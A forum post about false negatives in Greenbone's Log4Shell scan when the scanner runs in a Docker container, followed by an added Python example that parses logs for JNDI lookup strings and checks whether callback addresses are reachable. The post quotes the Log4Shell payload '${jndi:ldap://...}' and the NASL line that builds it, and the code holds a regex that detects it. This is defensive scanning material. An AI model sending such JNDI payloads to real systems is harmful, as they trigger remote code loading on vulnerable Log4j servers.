Hi there,
first, thanks for your fast reaction in general on this threat.
We scanned our network for log4shell from a container version of Greenbone (Docker Hub) and found no results. At a first look a nice result, but looking deeper into it we found that the payload has the form:
2021-12-20 10:39:41.354 INFO 1 --- [nio-8080-exec-3] HelloWorld : Received a request for API version ${jndi:ldap://172.18.0.3:15006/a}
The address 172.18.0.3 is the IP of the container Greenbone runs in and thus is not reachable from the outside. The IP seems to be random. I found that the 4 NASL files at /data/var-lib/openvas/plugins/2021/apache/gb_log4j_CVE-2021-44228_*.nasl all contain this payload definition:
payload = "${jndi:ldap://" + ownip + ":" + rnd_port + "/a}";
A random port can’t be published by the container at runtime, so here are my questions:
- When I change the payload locally - will this have any effect? Are the NASL files loaded when being executed or are they loaded at program start?
- Could there be a way to configure these settings, address and port, in the web GUI?
Best regards
Henri
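
Added example, not part of the original post and not Greenbone code: a check that reads the scanned application's log, extracts the callback address embedded in each JNDI lookup string, and flags addresses the target could not connect back to (which would make a "no results" scan a false negative). The names `classify_callback`, `TARGET_CIDRS` and the second log line are assumptions made for illustration; the classification is a heuristic based on address ranges only.

```python
import ipaddress
import re

# Plain (unobfuscated) JNDI lookup with a host and optional port, e.g.
# ${jndi:ldap://172.18.0.3:15006/a}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

def extract_callbacks(log_lines):
    """Return (scheme, host, port) for every JNDI lookup seen in the log lines."""
    found = []
    for line in log_lines:
        for m in JNDI_RE.finditer(line):
            port = int(m.group("port")) if m.group("port") else None
            found.append((m.group("scheme").lower(), m.group("host"), port))
    return found

def classify_callback(host, target_routable_cidrs):
    """Heuristic: can a scanned target plausibly connect back to this host?"""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"      # hostname: depends on the target's DNS
    if any(ip in ipaddress.ip_network(c) for c in target_routable_cidrs):
        return "routable"
    if ip.is_private:
        return "unroutable"   # private address outside the target's networks
    return "unknown"          # public address: depends on egress filtering

# First line is the log entry quoted in the post; the second is constructed.
SAMPLE_LOG = [
    "2021-12-20 10:39:41.354 INFO 1 --- [nio-8080-exec-3] HelloWorld : "
    "Received a request for API version ${jndi:ldap://172.18.0.3:15006/a}",
    "2021-12-20 10:41:02.118 INFO 1 --- [nio-8080-exec-5] HelloWorld : "
    "Received a request for API version ${jndi:ldap://10.20.0.15:15006/a}",
]
TARGET_CIDRS = ["10.20.0.0/16"]  # assumed: networks the target can route to

def report(log_lines, cidrs):
    """Return (host, port, verdict) for each callback found in the log."""
    return [(h, p, classify_callback(h, cidrs))
            for _, h, p in extract_callbacks(log_lines)]

if __name__ == "__main__":
    for host, port, verdict in report(SAMPLE_LOG, TARGET_CIDRS):
        print(f"{host}:{port} -> {verdict}")
```

An "unroutable" verdict for the scanner's own callback address means the scan result says nothing about whether the target is vulnerable.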